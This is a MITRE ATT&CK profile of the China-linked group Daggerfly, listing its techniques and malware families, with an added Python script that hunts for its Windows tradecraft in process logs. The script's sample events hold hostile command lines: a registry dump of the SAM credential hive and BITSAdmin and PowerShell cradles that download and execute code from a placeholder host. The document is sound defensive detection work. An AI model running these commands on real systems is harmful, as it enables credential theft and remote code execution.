
G1034 Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.[3][2][4][1]

| Item | Value |
|---|---|
| ID | G1034 |
| Associated Names | Evasive Panda, BRONZE HIGHLAND |
| Version | 1.0 |
| Created | 25 July 2024 |
| Last Modified | 31 October 2024 |
| Navigation Layer | View In ATT&CK® Navigator |

Associated Group Descriptions

| Name | Description |
|---|---|
| Evasive Panda | [3][1] |
| BRONZE HIGHLAND | [3][1] |

Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1071 | Application Layer Protocol | - |
| Enterprise | T1071.001 | Web Protocols | Daggerfly has used HTTP for command and control communication.[1] |
| Enterprise | T1059 | Command and Scripting Interpreter | - |
| Enterprise | T1059.001 | PowerShell | Daggerfly has used PowerShell to download and execute remotely hosted files on victim systems.[3] |
| Enterprise | T1584 | Compromise Infrastructure | - |
| Enterprise | T1584.004 | Server | Daggerfly compromised web servers hosting software updates as part of a supply chain intrusion.[1] |
| Enterprise | T1136 | Create Account | - |
| Enterprise | T1136.001 | Local Account | Daggerfly created a local account on victim machines to maintain access.[3] |
| Enterprise | T1587 | Develop Capabilities | - |
| Enterprise | T1587.002 | Code Signing Certificates | Daggerfly created code signing certificates to sign malicious macOS files.[1] |
| Enterprise | T1189 | Drive-by Compromise | Daggerfly has used strategic website compromise for initial access against victims.[1] |
| Enterprise | T1574 | Hijack Execution Flow | - |
| Enterprise | T1574.001 | DLL | Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.[3] Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[3] |
| Enterprise | T1036 | Masquerading | - |
| Enterprise | T1036.003 | Rename Legitimate Utilities | Daggerfly used a renamed copy of rundll32.exe, such as "dbengin.exe" located in the ProgramData\Microsoft\PlayReady directory, to proxy malicious DLL execution.[3] |
| Enterprise | T1003 | OS Credential Dumping | - |
| Enterprise | T1003.002 | Security Account Manager | Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.[3] |
| Enterprise | T1012 | Query Registry | Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.[3] |
| Enterprise | T1053 | Scheduled Task/Job | - |
| Enterprise | T1053.005 | Scheduled Task | Daggerfly has attempted to use scheduled tasks for persistence in victim environments.[1] |
| Enterprise | T1553 | Subvert Trust Controls | - |
| Enterprise | T1553.002 | Code Signing | Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.[1] |
| Enterprise | T1195 | Supply Chain Compromise | - |
| Enterprise | T1195.002 | Compromise Software Supply Chain | Daggerfly is associated with several supply chain compromises in which malicious updates were delivered to victims.[2][1] |
| Enterprise | T1218 | System Binary Proxy Execution | - |
| Enterprise | T1218.011 | Rundll32 | Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.[3] |
| Enterprise | T1082 | System Information Discovery | Daggerfly uses victim machine operating system information to build custom User-Agent strings for subsequent command and control communication.[1] |
| Enterprise | T1204 | User Execution | - |
| Enterprise | T1204.001 | Malicious Link | Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[1] |
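As an added example (not MITRE's content and not code from any of the cited reports), the following Python models the Windows-side tradecraft from the table above as detections over process-creation events, the way a hunter would run them against Sysmon Event ID 1 or EDR telemetry: a rundll32 running under another name (T1036.003 / T1218.011), `reg save` of the SAM, SYSTEM or SECURITY hives (T1003.002 / T1012), and BITSAdmin or PowerShell download activity (T1105). The sample events are constructed; the PlayReady directory and the dbengin.exe name come from the table, while the DLL name, the hostname (example.invalid, a reserved non-resolving name), job names and output paths are invented. The rename check compares the PE version-info OriginalFileName to the on-disk name, so it generalizes to any renamed copy of rundll32, not only dbengin.exe.

```python
"""Hunt for Daggerfly's Windows tradecraft in process-creation telemetry.

Added example; sample events below are constructed, not real telemetry.
Paths under ProgramData\\Microsoft\\PlayReady and the dbengin.exe name are
from the technique table; everything else (DLL, host, job, file names) is invented.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    image: str               # full path of the created process
    original_file_name: str  # PE version-info OriginalFileName (a Sysmon EID 1 field)
    command_line: str


SAMPLE_EVENTS = [
    # benign: the real rundll32 under its own name
    ProcEvent(r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    # T1036.003 / T1218.011: rundll32 copied to ProgramData\Microsoft\PlayReady as dbengin.exe
    ProcEvent(r"C:\ProgramData\Microsoft\PlayReady\dbengin.exe", "RUNDLL32.EXE",
              r"dbengin.exe C:\ProgramData\Microsoft\PlayReady\plugin.dll,Start"),
    # T1003.002 / T1012: SAM hive written to disk with reg.exe
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg save HKLM\SAM C:\ProgramData\sam.hiv"),
    # benign: reg.exe reading a single value
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v ProductName"),
    # T1105: BITSAdmin transfer from an external host (hostname invented)
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority high http://example.invalid/u.dat C:\ProgramData\u.dat"),
    # T1105: PowerShell download cradle (hostname invented)
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""),
    # benign PowerShell
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              "powershell Get-Process"),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def renamed_rundll32(ev: ProcEvent) -> bool:
    """T1036.003 + T1218.011: the binary identifies itself as rundll32 but runs under another name."""
    return ev.original_file_name.lower() == "rundll32.exe" and basename(ev.image) != "rundll32.exe"


# reg save / reg export of a credential-bearing hive; tolerates reg.exe and a quoted key
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.I)


def hive_dump_via_reg(ev: ProcEvent) -> Optional[str]:
    """T1003.002 / T1012: returns the hive name (sam, system, security) when reg.exe writes one out."""
    if basename(ev.image) != "reg.exe":
        return None
    m = HIVE_SAVE.search(ev.command_line)
    return m.group(1).lower() if m else None


# common PowerShell download primitives, including the Invoke-WebRequest aliases
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer",
    re.I)


def ingress_tool_transfer(ev: ProcEvent) -> bool:
    """T1105: BITSAdmin job creation or a PowerShell download cradle."""
    name = basename(ev.image)
    cmd = ev.command_line.lower()
    if name == "bitsadmin.exe":
        return "/transfer" in cmd or "/addfile" in cmd
    if name in ("powershell.exe", "pwsh.exe"):
        return PS_DOWNLOAD.search(cmd) is not None
    return False


def hunt(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """One (technique_id, image, detail) tuple per matched behaviour, in event order.
    A SAM dump is reported under both IDs, mirroring the table's mapping."""
    findings = []
    for ev in events:
        if renamed_rundll32(ev):
            findings.append(("T1036.003", ev.image, f"rundll32 running as {basename(ev.image)}"))
        hive = hive_dump_via_reg(ev)
        if hive == "sam":
            findings.append(("T1003.002", ev.image, "reg save of SAM hive"))
        if hive:
            findings.append(("T1012", ev.image, f"reg save of {hive.upper()} hive"))
        if ingress_tool_transfer(ev):
            findings.append(("T1105", ev.image, f"download via {basename(ev.image)}"))
    return findings


if __name__ == "__main__":
    for tid, image, detail in hunt(SAMPLE_EVENTS):
        print(f"{tid:<10} {detail:<36} {image}")
```

Running the script lists five findings from the seven constructed events: the renamed rundll32, the SAM dump (under T1003.002 and T1012), and the two downloads; the genuine rundll32, the `reg query` of one value and the plain `Get-Process` are not flagged. `reg export` is accepted alongside `reg save` because both write a hive to disk, and BITSAdmin `/addfile` is covered with `/transfer` because a job can be assembled incrementally before it is resumed.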

Software

| ID | Name | References | Techniques |
|---|---|---|---|
| S0190 | BITSAdmin | Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.[3] | BITS Jobs; Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol; Ingress Tool Transfer; Lateral Tool Transfer |
| S1016 | MacMa | Daggerfly is linked to the use, and potentially the development, of MacMa through overlapping command and control infrastructure and libraries shared with other unique tools.[4] | Audio Capture; Command and Scripting Interpreter: Unix Shell; Create or Modify System Process: Launch Agent; Credentials from Password Stores: Keychain; Data from Local System; Data Staged: Local Data Staging; Deobfuscate/Decode Files or Information; Encrypted Channel; Exfiltration Over C2 Channel; File and Directory Discovery; Indicator Removal: Clear Linux or Mac System Logs; Indicator Removal: Timestomp; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Local Storage Discovery; Native API; Non-Application Layer Protocol; Non-Standard Port; Process Discovery; Remote Services; Screen Capture; Subvert Trust Controls: Code Signing; Subvert Trust Controls: Gatekeeper Bypass; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery |
| S1146 | MgBot | Daggerfly is uniquely associated with the use of MgBot since at least 2012.[2] | Account Discovery: Domain Account; Account Discovery: Local Account; Audio Capture; Clipboard Data; Credentials from Password Stores; Credentials from Password Stores: Credentials from Web Browsers; Data from Information Repositories: Databases; Data from Local System; Data from Removable Media; Domain Trust Discovery; Input Capture: Keylogging; Network Service Discovery; OS Credential Dumping; Process Discovery; Remote System Discovery; Steal Web Session Cookie; System Owner/User Discovery |
| S1147 | Nightdoor | Daggerfly uses Nightdoor as a backdoor on Windows hosts.[1][4] | Application Layer Protocol; Command and Scripting Interpreter: Windows Command Shell; Deobfuscate/Decode Files or Information; Hijack Execution Flow; Indicator Removal: File Deletion; Local Storage Discovery; Process Discovery; Scheduled Task/Job: Scheduled Task; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Time Discovery; Virtualization/Sandbox Evasion: System Checks; Web Service |
| S0013 | PlugX | Daggerfly has used PlugX loaders as part of intrusions.[3] | Application Layer Protocol: Web Protocols; Application Layer Protocol: DNS; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Data Staged: Local Data Staging; Debugger Evasion; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Execution Guardrails: Mutual Exclusion; Exfiltration Over C2 Channel; File and Directory Discovery; Hide Artifacts: Hidden Files and Directories; Hide Artifacts: Hidden Window; Hijack Execution Flow: DLL; Impair Defenses: Disable or Modify System Firewall; Indicator Removal: Clear Persistence; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Local Storage Discovery; Masquerading: Masquerade Task or Service; Masquerading: Match Legitimate Resource Name or Location; Modify Registry; Native API; Network Share Discovery; Non-Application Layer Protocol; Non-Standard Port; Obfuscated Files or Information: Binary Padding; Obfuscated Files or Information: Dynamic API Resolution; Obfuscated Files or Information; Obfuscated Files or Information: Encrypted/Encoded File; Peripheral Device Discovery; Process Discovery; Query Registry; Reflective Code Loading; Replication Through Removable Media; Scheduled Task/Job: Scheduled Task; Screen Capture; System Information Discovery; System Location Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; System Time Discovery; Trusted Developer Utilities Proxy Execution: MSBuild; User Execution: Malicious File; Virtualization/Sandbox Evasion: System Checks; Web Service: Dead Drop Resolver |
| S0075 | Reg | Daggerfly has used Reg to dump various Windows registry hives from victim machines.[3] | Modify Registry; Query Registry; Unsecured Credentials: Credentials in Registry |

References